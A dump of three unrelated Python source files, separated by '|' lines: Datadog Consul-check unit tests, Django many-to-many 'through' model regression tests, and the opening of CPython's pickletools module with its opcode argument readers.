self.assertMetric('consul.catalog.nodes_passing', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_warning', value=0, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.nodes_critical', value=1, tags=['consul_datacenter:dc1', 'consul_service_id:service-1'])
self.assertMetric('consul.catalog.services_up', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_passing', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_warning', value=0, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
self.assertMetric('consul.catalog.services_critical', value=6, tags=['consul_datacenter:dc1', 'consul_node_id:node-1'])
def test_get_peers_in_cluster(self):
mocks = self._get_consul_mocks()
# When node is leader
self.run_check(MOCK_CONFIG, mocks=mocks)
self.assertMetric('consul.peers', value=3, tags=['consul_datacenter:dc1', 'mode:leader'])
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_B
# When node is follower
self.run_check(MOCK_CONFIG, mocks=mocks)
self.assertMetric('consul.peers', value=3, tags=['consul_datacenter:dc1', 'mode:follower'])
def test_cull_services_list(self):
self.check = load_check(self.CHECK_NAME, MOCK_CONFIG_LEADER_CHECK, self.DEFAULT_AGENT_CONFIG)
# Pad num_services to kick in truncation logic
num_services = self.check.MAX_SERVICES + 20
# Big whitelist
services = self.mock_get_n_services_in_cluster(num_services)
whitelist = ['service_{0}'.format(k) for k in range(num_services)]
self.assertEqual(len(self.check._cull_services_list(services, whitelist)), self.check.MAX_SERVICES)
# Whitelist < MAX_SERVICES should spit out the whitelist
services = self.mock_get_n_services_in_cluster(num_services)
whitelist = ['service_{0}'.format(k) for k in range(self.check.MAX_SERVICES-1)]
self.assertEqual(set(self.check._cull_services_list(services, whitelist)), set(whitelist))
# No whitelist, still triggers truncation
whitelist = []
self.assertEqual(len(self.check._cull_services_list(services, whitelist)), self.check.MAX_SERVICES)
# Num. services < MAX_SERVICES should be no-op in absence of whitelist
num_services = self.check.MAX_SERVICES - 1
services = self.mock_get_n_services_in_cluster(num_services)
self.assertEqual(len(self.check._cull_services_list(services, whitelist)), num_services)
# Num. services < MAX_SERVICES should spit out only the whitelist when one is defined
num_services = self.check.MAX_SERVICES - 1
whitelist = ['service_1', 'service_2', 'service_3']
services = self.mock_get_n_services_in_cluster(num_services)
self.assertEqual(set(self.check._cull_services_list(services, whitelist)), set(whitelist))
def test_new_leader_event(self):
self.check = load_check(self.CHECK_NAME, MOCK_CONFIG_LEADER_CHECK, self.DEFAULT_AGENT_CONFIG)
instance_hash = hash_mutable(MOCK_CONFIG_LEADER_CHECK['instances'][0])
self.check._instance_states[instance_hash].last_known_leader = 'My Old Leader'
mocks = self._get_consul_mocks()
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_B
self.run_check(MOCK_CONFIG_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 1)
event = self.events[0]
self.assertEqual(event['event_type'], 'consul.new_leader')
self.assertIn('prev_consul_leader:My Old Leader', event['tags'])
self.assertIn('curr_consul_leader:My New Leader', event['tags'])
def test_self_leader_event(self):
self.check = load_check(self.CHECK_NAME, MOCK_CONFIG_SELF_LEADER_CHECK, self.DEFAULT_AGENT_CONFIG)
instance_hash = hash_mutable(MOCK_CONFIG_SELF_LEADER_CHECK['instances'][0])
self.check._instance_states[instance_hash].last_known_leader = 'My Old Leader'
mocks = self._get_consul_mocks()
our_url = self.mock_get_cluster_leader_A(None)
other_url = self.mock_get_cluster_leader_B(None)
# We become the leader
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_A
self.run_check(MOCK_CONFIG_SELF_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 1)
self.assertEqual(our_url, self.check._instance_states[instance_hash].last_known_leader)
event = self.events[0]
self.assertEqual(event['event_type'], 'consul.new_leader')
self.assertIn('prev_consul_leader:My Old Leader', event['tags'])
self.assertIn('curr_consul_leader:%s' % our_url, event['tags'])
# We are already the leader, no new events
self.run_check(MOCK_CONFIG_SELF_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 0)
# We lose the leader, no new events
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_B
self.run_check(MOCK_CONFIG_SELF_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 0)
self.assertEqual(other_url, self.check._instance_states[instance_hash].last_known_leader)
# We regain the leadership
mocks['_get_cluster_leader'] = self.mock_get_cluster_leader_A
self.run_check(MOCK_CONFIG_SELF_LEADER_CHECK, mocks=mocks)
self.assertEqual(len(self.events), 1)
self.assertEqual(our_url, self.check._instance_states[instance_hash].last_known_leader)
event = self.events[0]
self.assertEqual(event['event_type'], 'consul.new_leader')
self.assertIn('prev_consul_leader:%s' % other_url, event['tags'])
self.assertIn('curr_consul_leader:%s' % our_url, event['tags'])
def test_network_latency_checks(self):
self.check = load_check(self.CHECK_NAME, MOCK_CONFIG_NETWORK_LATENCY_CHECKS,
self.DEFAULT_AGENT_CONFIG)
mocks = self._get_consul_mocks()
# We start out as the leader, and stay that way
instance_hash = hash_mutable(MOCK_CONFIG_NETWORK_LATENCY_CHECKS['instances'][0])
self.check._instance_states[instance_hash].last_known_leader = self.mock_get_cluster_leader_A(None)
self.run_check(MOCK_CONFIG_NETWORK_LATENCY_CHECKS, mocks=mocks)
latency = [m for m in self.metrics if m[0].startswith('consul.net.')]
latency.sort()
# Make sure we have the expected number of metrics
        self.assertEqual(19, len(latency))
        # Only 3 dc-latency metrics since we only do source = self
        dc = [m for m in latency if '.dc.latency.' in m[0]]
        self.assertEqual(3, len(dc))
        self.assertEqual(1.6746410750238774, dc[0][2])
        # 16 latency metrics, 2 nodes * 8 metrics each
        node = [m for m in latency if '.node.latency.' in m[0]]
        self.assertEqual(16, len(node))
        self.assertEqual(0.26577747932995816, node[0][2])
|
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.core import management
from django.test import TestCase
from django.utils.six import StringIO
from .models import (
Car, CarDriver, Driver, Group, Membership, Person, UserMembership,
)
class M2MThroughTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.bob = Person.objects.create(name="Bob")
cls.jim = Person.objects.create(name="Jim")
cls.rock = Group.objects.create(name="Rock")
cls.roll = Group.objects.create(name="Roll")
cls.frank = User.objects.create_user("frank", "frank@example.com", "password")
cls.jane = User.objects.create_user("jane", "jane@example.com", "password")
# normal intermediate model
cls.bob_rock = Membership.objects.create(person=cls.bob, group=cls.rock)
cls.bob_roll = Membership.objects.create(person=cls.bob, group=cls.roll, price=50)
cls.jim_rock = Membership.objects.create(person=cls.jim, group=cls.rock, price=50)
# intermediate model with custom id column
cls.frank_rock = UserMembership.objects.create(user=cls.frank, group=cls.rock)
cls.frank_roll = UserMembership.objects.create(user=cls.frank, group=cls.roll)
cls.jane_rock = UserMembership.objects.create(user=cls.jane, group=cls.rock)
def test_retrieve_reverse_m2m_items(self):
self.assertQuerysetEqual(
self.bob.group_set.all(), [
"<Group: Rock>",
"<Group: Roll>",
],
ordered=False
)
def test_retrieve_forward_m2m_items(self):
self.assertQuerysetEqual(
self.roll.members.all(), [
"<Person: Bob>",
]
)
def test_cannot_use_setattr_on_reverse_m2m_with_intermediary_model(self):
msg = (
"Cannot set values on a ManyToManyField which specifies an "
"intermediary model. Use m2m_through_regress.Membership's Manager "
"instead."
)
with self.assertRaisesMessage(AttributeError, msg):
self.bob.group_set.set([])
def test_cannot_use_setattr_on_forward_m2m_with_intermediary_model(self):
msg = (
"Cannot set values on a ManyToManyField which specifies an "
"intermediary model. Use m2m_through_regress.Membership's Manager "
"instead."
)
with self.assertRaisesMessage(AttributeError, msg):
self.roll.members.set([])
def test_cannot_use_create_on_m2m_with_intermediary_model(self):
with self.assertRaises(AttributeError):
self.rock.members.create(name="Anne")
def test_cannot_use_create_on_reverse_m2m_with_intermediary_model(self):
with self.assertRaises(AttributeError):
self.bob.group_set.create(name="Funk")
def test_retrieve_reverse_m2m_items_via_custom_id_intermediary(self):
self.assertQuerysetEqual(
self.frank.group_set.all(), [
"<Group: Rock>",
"<Group: Roll>",
],
ordered=False
)
def test_retrieve_forward_m2m_items_via_custom_id_intermediary(self):
self.assertQuerysetEqual(
self.roll.user_members.all(), [
"<User: frank>",
]
)
def test_join_trimming_forwards(self):
"""
Too many copies of the intermediate table aren't involved when doing a
join (#8046, #8254).
"""
self.assertQuerysetEqual(
self.rock.members.filter(membership__price=50), [
"<Person: Jim>",
]
)
def test_join_trimming_reverse(self):
self.assertQuerysetEqual(
self.bob.group_set.filter(membership__price=50), [
"<Group: Roll>",
]
)
class M2MThroughSerializationTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.bob = Person.objects.create(name="Bob")
cls.roll = Group.objects.create(name="Roll")
cls.bob_roll = Membership.objects.create(person=cls.bob, group=cls.roll)
def test_serialization(self):
"m2m-through models aren't serialized as m2m fields. Refs #8134"
pks = {"p_pk": self.bob.pk, "g_pk": self.roll.pk, "m_pk": self.bob_roll.pk}
out = StringIO()
management.call_command("dumpdata", "m2m_through_regress", format="json", stdout=out)
self.assertJSONEqual(
out.getvalue().strip(),
'[{"pk": %(m_pk)s, "model": "m2m_through_regress.membership", "fields": {"person": %(p_pk)s, "price": '
'100, "group": %(g_pk)s}}, {"pk": %(p_pk)s, "model": "m2m_through_regress.person", "fields": {"name": '
'"Bob"}}, {"pk": %(g_pk)s, "model": "m2m_through_regress.group", "fields": {"name": "Roll"}}]'
% pks
)
out = StringIO()
management.call_command("dumpdata", "m2m_through_regress", format="xml", indent=2, stdout=out)
self.assertXMLEqual(out.getvalue().strip(), """
<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0">
<object pk="%(m_pk)s" model="m2m_through_regress.membership">
<field to="m2m_through_regress.person" name="person" rel="ManyToOneRel">%(p_pk)s</field>
<field to="m2m_through_regress.group" name="group" rel="ManyToOneRel">%(g_pk)s</field>
<field type="IntegerField" name="price">100</field>
</object>
<object pk="%(p_pk)s" model="m2m_through_regress.person">
<field type="CharField" name="name">Bob</field>
</object>
<object pk="%(g_pk)s" model="m2m_through_regress.group">
<field type="CharField" name="name">Roll</field>
</object>
</django-objects>
""".strip() % pks)
class ToFieldThroughTests(TestCase):
def setUp(self):
self.car = Car.objects.create(make="Toyota")
self.driver = Driver.objects.create(name="Ryan Briscoe")
CarDriver.objects.create(car=self.car, driver=self.driver)
# We are testing whether the wrong objects get deleted when the wrong
# field value is used in m2m queries, so it is essential that the pk
# numberings do not match.
# Create one intentionally unused driver to mix up the autonumbering
self.unused_driver = Driver.objects.create(name="Barney Gumble")
# And two intentionally unused cars.
self.unused_car1 = Car.objects.create(make="Trabant")
self.unused_car2 = Car.objects.create(make="Wartburg")
def test_to_field(self):
self.assertQuerysetEqual(
self.car.drivers.all(),
["<Driver: Ryan Briscoe>"]
)
def test_to_field_reverse(self):
self.assertQuerysetEqual(
self.driver.car_set.all(),
["<Car: Toyota>"]
)
def test_to_field_clear_reverse(self):
self.driver.car_set.clear()
self.assertQuerysetEqual(
self.driver.car_set.all(), [])
def test_to_field_clear(self):
self.car.drivers.clear()
self.assertQuerysetEqual(
self.car.drivers.all(), [])
# Low level tests for _add_items and _remove_items. We test these methods
# because .add/.remove aren't available for m2m fields with through, but
# through is the only way to set to_field currently. We do want to make
# sure these methods are ready if the ability to use .add or .remove with
# to_field relations is added some day.
def test_add(self):
self.assertQuerysetEqual(
self.car.drivers.all(),
["<Driver: Ryan Briscoe>"]
)
# Yikes - barney is going to drive...
self.car.drivers._add_items('car', 'driver', self.unused_driver)
self.assertQuerysetEqual(
self.car.drivers.all(),
["<Driver: Barney Gumble>", "<Driver: Ryan Briscoe>"]
)
def test_add_null(self):
nullcar = Car.objects.create(make=None)
with self.assertRaises(ValueError):
nullcar.drivers._add_items('car', 'driver', self.unused_driver)
def test_add_related_null(self):
nulldriver = Driver.objects.create(name=None)
with self.assertRaises(ValueError):
self.car.drivers._add_items('car', 'driver', nulldriver)
def test_add_reverse(self):
car2 = Car.objects.create(make="Honda")
self.assertQuerysetEqual(
self.driver.car_set.all(),
["<Car: Toyota>"]
)
self.driver.car_set._add_items('driver', 'car', car2)
self.assertQuerysetEqual(
self.driver.car_set.all(),
["<Car: Toyota>", "<Car: Honda>"],
ordered=False
)
def test_add_null_reverse(self):
nullcar = Car.objects.create(make=None)
with self.assertRaises(ValueError):
self.driver.car_set._add_items('driver', 'car', nullcar)
def test_add_null_reverse_related(self):
nulldriver = Driver.objects.create(name=None)
with self.assertRaises(ValueError):
nulldriver.car_set._add_items('driver', 'car', self.car)
def test_remove(self):
self.assertQuerysetEqual(
self.car.drivers.all(),
["<Driver: Ryan Briscoe>"]
)
self.car.drivers._remove_items('car', 'driver', self.driver)
self.assertQuerysetEqual(
self.car.drivers.all(), [])
def test_remove_reverse(self):
self.assertQuerysetEqual(
self.driver.car_set.all(),
["<Car: Toyota>"]
)
self.driver.car_set._remove_items('driver', 'car', self.car)
self.assertQuerysetEqual(
self.driver.car_set.all(), [])
class ThroughLoadDataTestCase(TestCase):
fixtures = ["m2m_through"]
def test_sequence_creation(self):
"""
Sequences on an m2m_through are created for the through model, not a
phantom auto-generated m2m table (#11107).
"""
out = StringIO()
management.call_command("dumpdata", "m2m_through_regress", format="json", stdout=out)
self.assertJSONEqual(
out.getvalue().strip(),
'[{"pk": 1, "model": "m2m_through_regress.usermembership", "fields": {"price": 100, "group": 1, "user"'
': 1}}, {"pk": 1, "model": "m2m_through_regress.person", "fields": {"name": "Guido"}}, {"pk": 1, '
'"model": "m2m_through_regress.group", "fields": {"name": "Python Core Group"}}]'
)
|
'''"Executable documentation" for the pickle module.
Extensive comments about the pickle protocols and pickle-machine opcodes
can be found here. Some functions meant for external use:
genops(pickle)
Generate all the opcodes in a pickle, as (opcode, arg, position) triples.
dis(pickle, out=None, memo=None, indentlevel=4)
Print a symbolic disassembly of a pickle.
'''
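# A minimal usage sketch (hedged): feed any pickle bytestring to dis() for a
# symbolic listing, or walk the opcodes yourself with genops(), e.g.
#
#     >>> import pickle
#     >>> [op.name for op, arg, pos in genops(pickle.dumps(42, protocol=0))]
#     ['INT', 'STOP']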
import codecs
import io
import pickle
import re
import sys
__all__ = ['dis', 'genops', 'optimize']
bytes_types = pickle.bytes_types
UP_TO_NEWLINE = -1
TAKEN_FROM_ARGUMENT1 = -2 # num bytes is 1-byte unsigned int
TAKEN_FROM_ARGUMENT4 = -3 # num bytes is 4-byte signed little-endian int
TAKEN_FROM_ARGUMENT4U = -4 # num bytes is 4-byte unsigned little-endian int
TAKEN_FROM_ARGUMENT8U = -5 # num bytes is 8-byte unsigned little-endian int
class ArgumentDescriptor(object):
__slots__ = (
# name of descriptor record, also a module global name; a string
'name',
# length of argument, in bytes; an int; UP_TO_NEWLINE and
# TAKEN_FROM_ARGUMENT{1,4,8} are negative values for variable-length
# cases
'n',
# a function taking a file-like object, reading this kind of argument
# from the object at the current position, advancing the current
# position by n bytes, and returning the value of the argument
'reader',
# human-readable docs for this arg descriptor; a string
'doc',
)
def __init__(self, name, n, reader, doc):
assert isinstance(name, str)
self.name = name
assert isinstance(n, int) and (n >= 0 or
n in (UP_TO_NEWLINE,
TAKEN_FROM_ARGUMENT1,
TAKEN_FROM_ARGUMENT4,
TAKEN_FROM_ARGUMENT4U,
TAKEN_FROM_ARGUMENT8U))
self.n = n
self.reader = reader
assert isinstance(doc, str)
self.doc = doc
from struct import unpack as _unpack
def read_uint1(f):
r"""
>>> import io
>>> read_uint1(io.BytesIO(b'\xff'))
255
"""
data = f.read(1)
if data:
return data[0]
raise ValueError("not enough data in stream to read uint1")
uint1 = ArgumentDescriptor(
name='uint1',
n=1,
reader=read_uint1,
doc="One-byte unsigned integer.")
def read_uint2(f):
r"""
>>> import io
>>> read_uint2(io.BytesIO(b'\xff\x00'))
255
>>> read_uint2(io.BytesIO(b'\xff\xff'))
65535
"""
data = f.read(2)
if len(data) == 2:
return _unpack("<H", data)[0]
raise ValueError("not enough data in stream to read uint2")
uint2 = ArgumentDescriptor(
name='uint2',
n=2,
reader=read_uint2,
doc="Two-byte unsigned integer, little-endian.")
def read_int4(f):
r"""
>>> import io
>>> read_int4(io.BytesIO(b'\xff\x00\x00\x00'))
255
>>> read_int4(io.BytesIO(b'\x00\x00\x00\x80')) == -(2**31)
True
"""
data = f.read(4)
if len(data) == 4:
return _unpack("<i", data)[0]
raise ValueError("not enough data in stream to read int4")
int4 = ArgumentDescriptor(
name='int4',
n=4,
reader=read_int4,
doc="Four-byte signed integer, little-endian, 2's complement.")
def read_uint4(f):
r"""
>>> import io
>>> read_uint4(io.BytesIO(b'\xff\x00\x00\x00'))
255
>>> read_uint4(io.BytesIO(b'\x00\x00\x00\x80')) == 2**31
True
"""
data = f.read(4)
if len(data) == 4:
return _unpack("<I", data)[0]
raise ValueError("not enough data in stream to read uint4")
uint4 = ArgumentDescriptor(
name='uint4',
n=4,
reader=read_uint4,
doc="Four-byte unsigned integer, little-endian.")
def read_uint8(f):
r"""
>>> import io
>>> read_uint8(io.BytesIO(b'\xff\x00\x00\x00\x00\x00\x00\x00'))
255
>>> read_uint8(io.BytesIO(b'\xff' * 8)) == 2**64-1
True
"""
data = f.read(8)
if len(data) == 8:
return _unpack("<Q", data)[0]
raise ValueError("not enough data in stream to read uint8")
uint8 = ArgumentDescriptor(
name='uint8',
n=8,
reader=read_uint8,
doc="Eight-byte unsigned integer, little-endian.")
def read_stringnl(f, decode=True, stripquotes=True):
r"""
>>> import io
>>> read_stringnl(io.BytesIO(b"'abcd'\nefg\n"))
'abcd'
>>> read_stringnl(io.BytesIO(b"\n"))
Traceback (most recent call last):
...
ValueError: no string quotes around b''
>>> read_stringnl(io.BytesIO(b"\n"), stripquotes=False)
''
>>> read_stringnl(io.BytesIO(b"''\n"))
''
>>> read_stringnl(io.BytesIO(b'"abcd"'))
Traceback (most recent call last):
...
ValueError: no newline found when trying to read stringnl
Embedded escapes are undone in the result.
>>> read_stringnl(io.BytesIO(br"'a\n\\b\x00c\td'" + b"\n'e'"))
'a\n\\b\x00c\td'
"""
data = f.readline()
if not data.endswith(b'\n'):
raise ValueError("no newline found when trying to read stringnl")
data = data[:-1] # lose the newline
if stripquotes:
for q in (b'"', b"'"):
if data.startswith(q):
if not data.endswith(q):
raise ValueError("strinq quote %r not found at both "
"ends of %r" % (q, data))
data = data[1:-1]
break
else:
raise ValueError("no string quotes around %r" % data)
if decode:
data = codecs.escape_decode(data)[0].decode("ascii")
return data
stringnl = ArgumentDescriptor(
name='stringnl',
n=UP_TO_NEWLINE,
reader=read_stringnl,
doc="""A newline-terminated string.
This is a repr-style string, with embedded escapes, and
bracketing quotes.
""")
def read_stringnl_noescape(f):
return read_stringnl(f, stripquotes=False)
stringnl_noescape = ArgumentDescriptor(
name='stringnl_noescape',
n=UP_TO_NEWLINE,
reader=read_stringnl_noescape,
doc="""A newline-terminated string.
This is a str-style string, without embedded escapes,
or bracketing quotes. It should consist solely of
printable ASCII characters.
""")
def read_stringnl_noescape_pair(f):
r"""
>>> import io
>>> read_stringnl_noescape_pair(io.BytesIO(b"Queue\nEmpty\njunk"))
'Queue Empty'
"""
return "%s %s" % (read_stringnl_noescape(f), read_stringnl_noescape(f))
stringnl_noescape_pair = ArgumentDescriptor(
name='stringnl_noescape_pair',
n=UP_TO_NEWLINE,
reader=read_stringnl_noescape_pair,
doc="""A pair of newline-terminated strings.
These are str-style strings, without embedded
escapes, or bracketing quotes. They should
consist solely of printable ASCII characters.
The pair is returned as a single string, with
a single blank separating the two strings.
""")
def read_string1(f):
r"""
>>> import io
>>> read_string1(io.BytesIO(b"\x00"))
''
>>> read_string1(io.BytesIO(b"\x03abcdef"))
'abc'
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return data.decode("latin-1")
raise ValueError("expected %d bytes in a string1, but only %d remain" %
(n, len(data)))
string1 = ArgumentDescriptor(
name="string1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_string1,
doc="""A counted string.
The first argument is a 1-byte unsigned int giving the number
of bytes in the string, and the second argument is that many
bytes.
""")
def read_string4(f):
r"""
>>> import io
>>> read_string4(io.BytesIO(b"\x00\x00\x00\x00abc"))
''
>>> read_string4(io.BytesIO(b"\x03\x00\x00\x00abcdef"))
'abc'
>>> read_string4(io.BytesIO(b"\x00\x00\x00\x03abcdef"))
Traceback (most recent call last):
...
ValueError: expected 50331648 bytes in a string4, but only 6 remain
"""
n = read_int4(f)
if n < 0:
raise ValueError("string4 byte count < 0: %d" % n)
data = f.read(n)
if len(data) == n:
return data.decode("latin-1")
raise ValueError("expected %d bytes in a string4, but only %d remain" %
(n, len(data)))
string4 = ArgumentDescriptor(
name="string4",
n=TAKEN_FROM_ARGUMENT4,
reader=read_string4,
doc="""A counted string.
The first argument is a 4-byte little-endian signed int giving
the number of bytes in the string, and the second argument is
that many bytes.
""")
def read_bytes1(f):
r"""
>>> import io
>>> read_bytes1(io.BytesIO(b"\x00"))
b''
>>> read_bytes1(io.BytesIO(b"\x03abcdef"))
b'abc'
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes1, but only %d remain" %
(n, len(data)))
bytes1 = ArgumentDescriptor(
name="bytes1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_bytes1,
doc="""A counted bytes string.
The first argument is a 1-byte unsigned int giving the number
of bytes, and the second argument is that many bytes.
""")
def read_bytes4(f):
r"""
>>> import io
>>> read_bytes4(io.BytesIO(b"\x00\x00\x00\x00abc"))
b''
>>> read_bytes4(io.BytesIO(b"\x03\x00\x00\x00abcdef"))
b'abc'
>>> read_bytes4(io.BytesIO(b"\x00\x00\x00\x03abcdef"))
Traceback (most recent call last):
...
ValueError: expected 50331648 bytes in a bytes4, but only 6 remain
"""
n = read_uint4(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("bytes4 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes4, but only %d remain" %
(n, len(data)))
bytes4 = ArgumentDescriptor(
name="bytes4",
n=TAKEN_FROM_ARGUMENT4U,
reader=read_bytes4,
doc="""A counted bytes string.
The first argument is a 4-byte little-endian unsigned int giving
the number of bytes, and the second argument is that many bytes.
""")
def read_bytes8(f):
r"""
>>> import io, struct, sys
>>> read_bytes8(io.BytesIO(b"\x00\x00\x00\x00\x00\x00\x00\x00abc"))
b''
>>> read_bytes8(io.BytesIO(b"\x03\x00\x00\x00\x00\x00\x00\x00abcdef"))
b'abc'
>>> bigsize8 = struct.pack("<Q", sys.maxsize//3)
>>> read_bytes8(io.BytesIO(bigsize8 + b"abcdef")) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: expected ... bytes in a bytes8, but only 6 remain
"""
n = read_uint8(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("bytes8 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return data
raise ValueError("expected %d bytes in a bytes8, but only %d remain" %
(n, len(data)))
bytes8 = ArgumentDescriptor(
name="bytes8",
n=TAKEN_FROM_ARGUMENT8U,
reader=read_bytes8,
doc="""A counted bytes string.
The first argument is an 8-byte little-endian unsigned int giving
the number of bytes, and the second argument is that many bytes.
""")
def read_unicodestringnl(f):
r"""
>>> import io
>>> read_unicodestringnl(io.BytesIO(b"abc\\uabcd\njunk")) == 'abc\uabcd'
True
"""
data = f.readline()
if not data.endswith(b'\n'):
raise ValueError("no newline found when trying to read "
"unicodestringnl")
data = data[:-1] # lose the newline
return str(data, 'raw-unicode-escape')
unicodestringnl = ArgumentDescriptor(
name='unicodestringnl',
n=UP_TO_NEWLINE,
reader=read_unicodestringnl,
doc="""A newline-terminated Unicode string.
This is raw-unicode-escape encoded, so consists of
printable ASCII characters, and may contain embedded
escape sequences.
""")
def read_unicodestring1(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc)]) # little-endian 1-byte length
>>> t = read_unicodestring1(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring1(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring1, but only 6 remain
"""
n = read_uint1(f)
assert n >= 0
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring1, but only %d "
"remain" % (n, len(data)))
unicodestring1 = ArgumentDescriptor(
name="unicodestring1",
n=TAKEN_FROM_ARGUMENT1,
reader=read_unicodestring1,
doc="""A counted Unicode string.
The first argument is a 1-byte unsigned int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_unicodestring4(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc), 0, 0, 0]) # little-endian 4-byte length
>>> t = read_unicodestring4(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring4(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring4, but only 6 remain
"""
n = read_uint4(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("unicodestring4 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring4, but only %d "
"remain" % (n, len(data)))
unicodestring4 = ArgumentDescriptor(
name="unicodestring4",
n=TAKEN_FROM_ARGUMENT4U,
reader=read_unicodestring4,
doc="""A counted Unicode string.
The first argument is a 4-byte little-endian unsigned int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_unicodestring8(f):
r"""
>>> import io
>>> s = 'abcd\uabcd'
>>> enc = s.encode('utf-8')
>>> enc
b'abcd\xea\xaf\x8d'
>>> n = bytes([len(enc)]) + b'\0' * 7 # little-endian 8-byte length
>>> t = read_unicodestring8(io.BytesIO(n + enc + b'junk'))
>>> s == t
True
>>> read_unicodestring8(io.BytesIO(n + enc[:-1]))
Traceback (most recent call last):
...
ValueError: expected 7 bytes in a unicodestring8, but only 6 remain
"""
n = read_uint8(f)
assert n >= 0
if n > sys.maxsize:
raise ValueError("unicodestring8 byte count > sys.maxsize: %d" % n)
data = f.read(n)
if len(data) == n:
return str(data, 'utf-8', 'surrogatepass')
raise ValueError("expected %d bytes in a unicodestring8, but only %d "
"remain" % (n, len(data)))
unicodestring8 = ArgumentDescriptor(
name="unicodestring8",
n=TAKEN_FROM_ARGUMENT8U,
reader=read_unicodestring8,
doc="""A counted Unicode string.
The first argument is an 8-byte little-endian unsigned int
giving the number of bytes in the string, and the second
argument-- the UTF-8 encoding of the Unicode string --
contains that many bytes.
""")
def read_decimalnl_short(f):
r"""
>>> import io
>>> read_decimalnl_short(io.BytesIO(b"1234\n56"))
1234
>>> read_decimalnl_short(io.BytesIO(b"1234L\n56"))
Traceback (most recent call last):
...
ValueError: invalid literal for int() with base 10: b'1234L'
"""
s = read_stringnl(f, decode=False, stripquotes=False)
# There's a hack for True and False here.
if s == b"00":
return False
elif s == b"01":
return True
return int(s)
def read_decimalnl_long(f):
r"""
>>> import io
>>> read_decimalnl_long(io.BytesIO(b"1234L\n56"))
1234
>>> read_decimalnl_long(io.BytesIO(b"123456789012345678901234L\n6"))
123456789012345678901234
"""
s = read_stringnl(f, decode=False, stripquotes=False)
if s[-1:] == b'L':
s = s[:-1]
return int(s)
decimalnl_short = ArgumentDescriptor(
name='decimalnl_short',
n=UP_TO_NEWLINE,
reader=read_decimalnl_short,
doc="""A newline-terminated decimal integer literal.
This never has a trailing 'L', and the integer fit
in a short Python int on the box where the pickle
was written -- but there's no guarantee it will fit
in a short Python int on the box where the pickle
is read.
""")
decimalnl_long = ArgumentDescriptor(
name='decimalnl_long',
n=UP_TO_NEWLINE,
reader=read_decimalnl_long,
doc="""A newline-terminated decimal integer literal.
This has a trailing 'L', and can represent integers
of any size.
""")
def read_floatnl(f):
r"""
>>> import io
>>> read_floatnl(io.BytesIO(b"-1.25\n6"))
-1.25
"""
s = read_stringnl(f, decode=False, stripquotes=False)
return float(s)
floatnl = ArgumentDescriptor(
name='floatnl',
n=UP_TO_NEWLINE,
reader=read_floatnl,
doc="""A newline-terminated decimal floating literal.
In general this requires 17 significant digits for roundtrip
identity, and pickling then unpickling infinities, NaNs, and
minus zero doesn't work across boxes, or on some boxes even
on itself (e.g., Windows can't read the strings it produces
for infinities or NaNs).
""")
def read_float8(f):
r"""
>>> import io, struct
>>> raw = struct.pack(">d", -1.25)
>>> raw
b'\xbf\xf4\x00\x00\x00\x00\x00\x00'
>>> read_float8(io.BytesIO(raw + b"\n"))
-1.25
"""
data = f.read(8)
if len(data) == 8:
return _unpack(">d", data)[0]
raise ValueError("not enough data in stream to read float8")
float8 = ArgumentDescriptor(
name='float8',
n=8,
reader=read_float8,
doc="""An 8-byte binary representation of a float, big-endian.
The format is unique to Python, and shared with the struct
module (format string '>d') "in theory" (the struct and pickle
implementations don't share the code -- they should). It's
strongly related to the IEEE-754 double format, and, in normal
cases, is in fact identical to the big-endian 754 double format.
On other boxes the dynamic range is limited to that of a 754
double, and "add a half and chop" rounding is used to reduce
the precision to 53 bits. However, even on a 754 box,
infinities, NaNs, and minus zero may not be handled correctly
(may not survive roundtrip pickling intact).
""")
from pickle import decode_long
def read_long1(f):
r"""
>>> import io
